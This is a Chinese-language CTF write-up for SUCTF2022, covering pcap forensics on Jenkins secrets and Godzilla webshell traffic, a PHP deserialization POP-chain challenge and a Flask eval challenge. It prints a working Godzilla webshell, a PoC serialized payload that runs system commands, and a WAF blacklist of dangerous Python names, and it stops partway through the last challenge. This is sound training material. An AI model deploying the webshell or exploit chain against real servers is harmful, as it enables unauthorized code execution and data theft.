开发: C++知识库 Java知识库 JavaScript Python PHP知识库人工智能区块链大数据移动开发嵌入式开发工具数据结构与算法开发测试游戏开发网络协议系统运维
教程: HTML教程 CSS教程 JavaScript教程 Go语言教程 JQuery教程 VUE教程 VUE3教程 Bootstrap教程 SQL数据库教程 C语言教程 C++教程 Java教程 Python教程 Python3教程 C#教程
数码: 电脑笔记本显卡显示器固态硬盘硬盘耳机手机 iphone vivo oppo 小米华为单反装机图拉丁

-> 开发工具 -> [SUCTF2022]wp -> 正文阅读

[开发工具][SUCTF2022]wp

Misc

Hi hacker

下载到是一个流量包，分析tcp流，发现是一个后面执行命令的
在这里插入图片描述
这里有一个文件jenkins_secret.zip

看下一个包里面，他进行了这样的操作

这看起来像是把文件发送的一个作用

分析icmp协议，找到这个secret文件

压缩文件是损坏的

binwalk分离一些，修复一下压缩包，总共就弄到了这些东西，还差了一些xml文件
在这里插入图片描述
这些应该是什么某种加密
这个是java的一个类似于插件的一个东西

org.jenkinsci.main.modules.instance_identity

github：https://github.com/jenkinsci/instance-identity-plugin

在github搜了一下，找到了几个对应的文件
在这里插入图片描述
找到了一个jenkins的解密的一个项目
https://github.com/hoto/jenkins-credentials-decryptor

这几个文件在流量包里都能找到，但是xml文件一直提取不出来
他发送是只是一个数据包，但是这里他分了四块去传输，这样数据混乱了，我无法将他们重新拼接起来，不知道是从哪里断的
找了一下规律，第一个应该是由PK来开头的，猜测数据应该是由这里开始
在这里插入图片描述
每一个文件结尾都有个，猜测也是icmp传输的某个格式文本

而且只有最后第565个包里面是有压缩文件尾的，504b0506

所以我猜测是四个拼接起来合成完整的zip文件
我尝试和了一下，用winrar修复了一下

差一个global_config.xml，而且xml文件还是处于损坏状态，无法提取。。。
脱出四个分块，放一起对比一下，相同的尾
在这里插入图片描述

拼了很久很久发现，漏了几个包
主要看这里
过滤一下(icmp.ident == 135) && (ip.src == 172.17.0.2)
把8个包的data流拿出来，去掉头部和尾部再拼接

终于得到了完好的压缩包，xml文件算是拿到了
在这里插入图片描述
然后就是用刚才的工具

解密得到一个github是ssh私钥

还有一个hint

这里获取了ssh的私钥

流量包里面，第一个http流里面有这样的信息

所以接下来的目标就是利用这个私钥去拉取这个仓库
把私钥文件丢到~./ssh里面
然后用私钥去生成一个公钥

ssh-keygen -y -f id_rsa > id_rsa.pub

然后就可以clone了

git clone Esonhugh@github:Esonhugh/secret_source_code.git

在这里插入图片描述
里面的文件就是http的第一个包的服务，没有flag
那就看一下git log，果然发现了端倪

都看了一下，发现flag是在source1里面

DASCTF{Oh!_H4ck_f0r_c0d3s-and_4buse_1t}

月圆之夜

其实就是找一个映射的关系
比如机械师是mechanic，对应了他的字母，然后翻译出来对应回去就是了
在这里插入图片描述
mechanic

werewolf

magician

knight

soul hunter

n

witch
在这里插入图片描述
nun

apothecary

Ranger

对比一下flag

dasctf{welcometothefullmoonnight}

Au5t1n的秘密

中间有http流，貌似是扫描了一下目录
在这里插入图片描述
在1994组里面，貌似是扫到了后台

这里用admin:admin貌似登陆进去了
在这里插入图片描述

进后台后进行了一个上传操作，这里提示了密钥是key is key1**
在这里插入图片描述

传了文件名为key.php.mod
第二次上传
在这里插入图片描述
内容是一个木马，didi.php，是一个哥斯拉马子，但是好像还改过

<?php
@session_start();
@set_time_limit(0);
@error_reporting(0);
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}
$payloadName='payload';
$key='093c1c388069b7e1';
$data=file_get_contents("php://input");
if ($data!==false){
    $data=encode($data,$key);
    if (isset($_SESSION[$payloadName])){
        $payload=encode($_SESSION[$payloadName],$key);
		eval($payload);
        echo encode(@run($data),$key);
    }else{
        if (stripos($data,"getBasicsInfo")!==false){
            $_SESSION[$payloadName]=encode($data,$key);
        }
    }
}

继续往后翻，找到对这个后面的利用了
在这里插入图片描述
被加密了，解一下哥斯拉的加密才行

写一个脚本逆一下

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}


$payloadName='payload';
$key='093c1c388069b7e1';
$data='1d430243025e5d4c55444a5f56174351401b4a0a6e391c6763736a5f56174351401b4a0a6e395e4d5e554d0b580b11424c5d4b15135e4b114b3b3342174511425c7
。
。（省略）
。
70657304a4b4c555b7f1759061919023e69114f726d2d75726c656e636f6465640d0a436f6e74656e742d4c656e6774683a2031390d0a0d0a545617590c5776595d533b66376531445c4017';
echo encode(hex2bin($data),$key);

在这里插入图片描述
解密拿到源码，这就是哥斯拉注入的一些东西，不用管

$parameters=array(); $_SES=array(); function run($pms){ reDefSystemFunc(); $_SES=&getSession(); @session_start(); $sessioId=md5(session_id()); if (isset($_SESSION[$sessioId])){ $_SES=unserialize((S1MiwYYr(base64Decode($_SESSION[$sessioId],$sessioId),$sessioId))); } @session_write_close(); if (canCallGzipDecode()==1&&@isGzipStream($pms)){ $pms=gzdecode($pms); } formatParameter($pms); if 
。
。（省略）
。
strlen($string); $i++){ array_push($bytes,ord($string[$i])); } return $bytes; }

再看看他其他的操作，这个流里面就是一些加载配置的操作了
后面的包，流量就解不出了，不知道为啥
他们有一个特征就是都有一个这样的头
在这里插入图片描述
我怀疑是不是有一个什么格式，后来去了解了一下哥斯拉的木马，发现在Godzillas v3.03以后对发送以及返回流量增加了gzip压缩，我把脚本一改

<?php
function encode($D,$K){
    for($i=0;$i<strlen($D);$i++) {
        $c = $K[$i+1&15];
        $D[$i] = $D[$i]^$c;
    }
    return $D;
}


$payloadName='payload';
$key='093c1c388069b7e1';
$data='';
echo bin2hex(encode(hex2bin($data),$key));

看一下文件头，哦豁，真是gzip压缩的格式
在这里插入图片描述
这样就可以拉去gzip -d解压了

解压出来，果然有数据！！

然后就可以去试了

在当前目录发现了flag.zip，时间还是2022的

然后就是一个个的去试，在2079号包里面，找到了相关信息

上面的解密得到，这是他文件上传的表单，我们就可以拿下这个flag.zip了
在这里插入图片描述
但是他有一个密码，密码为password is md5(Godzilla’ key)，那找key就是最后的一步了
key进行md5后的前16位为

093c1c388069b7e1

写一个脚本爆破一下

import string
import hashlib


def md5(s):
    return hashlib.md5(s.encode(encoding='utf-8')).hexdigest()
s = string.printable
k = 'key1'
for a in s:
    for b in s:
        for c in s:
            key = k+a+b+c
            if(md5(key)[0:16]=="093c1c388069b7e1"):
                print(key)
                break

在这里插入图片描述
md5加密以后解开压缩包拿到flag

093c1c388069b7e18bb4e898fc5ee049

在这里插入图片描述

Web

ezpop

题目给了如下代码

<?php

class crow
{
    public $v1;
    public $v2;

    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;

    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' . $this->m1);
    }

}

入口的类肯定是fin，最后的目的肯定是在mix里面的get_flag方法里面去执行eval函数
get_flag的入口也在fin里面，是fin的__call函数，而能调用call的只有一个地方，就是crow的__invoke函数
在这里插入图片描述
那能调用invoke的地方这里就有很多了
fin里面的run方法

或者mix的run方法

这里不知道从哪里开始分析，那就先看入口fin的__destruct函数，这里进行了一个字符串拼接，那么就是会触发一个__toString方法了
toString方法只有what有，那么f1的值就应该是what了
在这里插入图片描述
这里进what的tostring以后会调用run方法，这里就有分支了，但是感觉两个都用得到，所以可能是利用了这个trick，[class,func]去跳转到crow的eval方法
一开始想着要把所有方法都连接上。所以这样想的

new fin(new what(new fin([new crow(new what(1),new mix(new crow(new fin(new mix(1)),1))),"eval"])))

但是发现tostring会比析构还先执行，导致打不通，
然后发现是不是我想复杂了，直接用这个小trick连上get_flag方法就能直接执行了。。。
在这里插入图片描述
这里还耍我一轮

写马写不了

直接看当前目录

这里又耍我一轮

拿到flag

最后的poc

<?php

class crow
{
    public $v1;
    public $v2;
    public function __construct($a,$b){
        $this->v1 = $a;
        $this->v2 = $b;
    }
    function eval() {
        echo new $this->v1($this->v2);
    }

    public function __invoke()
    {
        $this->v1->world();
    }
}

class fin
{
    public $f1;
    public function __construct($a){
        $this->f1 = $a;
    }

    public function __destruct()
    {
        echo $this->f1 . '114514';
    }

    public function run()
    {
        ($this->f1)();
    }

    public function __call($a, $b)
    {
        echo $this->f1->get_flag();
    }

}

class what
{
    public $a;
    public function __construct($a){
        $this->a = $a;
    }

    public function __toString()
    {
        $this->a->run();
        return 'hello';
    }
}
class mix
{
    public $m1;
    public function __construct($a){
        $this->m1 = $a;
    }
    public function run()
    {
        ($this->m1)();
    }

    public function get_flag()
    {
        eval('#' .$this->m1);
    }

}

#$ser = new fin(new what(new fin([new crow(new what(1),new mix(new crow(new fin(new mix(1)),1))),"eval"])));
$ser = new fin(new what(new fin([new mix('?><?php system("cat H0mvz*");?>'),'get_flag'])));
echo urlencode(serialize($ser));

calc

题目给了源码

#coding=utf-8
from flask import Flask,render_template,url_for,render_template_string,redirect,request,current_app,session,abort,send_from_directory
import random
from urllib import parse
import os
from werkzeug.utils import secure_filename
import time


app=Flask(__name__)

def waf(s):
    blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']
    flag = True
    for no in blacklist:
        if no.lower() in s.lower():
            flag= False
            print(no)
            break
    return flag
    

@app.route("/")
def index():
    "欢迎来到SUctf2022"
    return render_template("index.html")

@app.route("/calc",methods=['GET'])
def calc():
    ip = request.remote_addr
    num = request.values.get("num")
    log = "echo {0} {1} {2}> ./tmp/log.txt".format(time.strftime("%Y%m%d-%H%M%S",time.localtime()),ip,num)
    
    if waf(num):
        try:
            data = eval(num)
            os.system(log)
        except:
            pass
        return str(data)
    else:
        return "waf!!"

if __name__ == "__main__":
    app.run(host='0.0.0.0',port=5000)

这里就是传了一个num参数进去，这里如果参数通过了waf，那么就会计算结果，并且system函数执行log，猜测这里是通过注入一些危险的命令去执行
这里有一个waf，过滤了很多东西

blacklist = ['import','(',')',' ','_','|',';','"','{','}','&','getattr','os','system','class','subclasses','mro','request','args','eval','if','subprocess','file','open','popen','builtins','compile','execfile','from_pyfile','config','local','self','item','getitem','getattribute','func_globals','__init__','join','__dict__']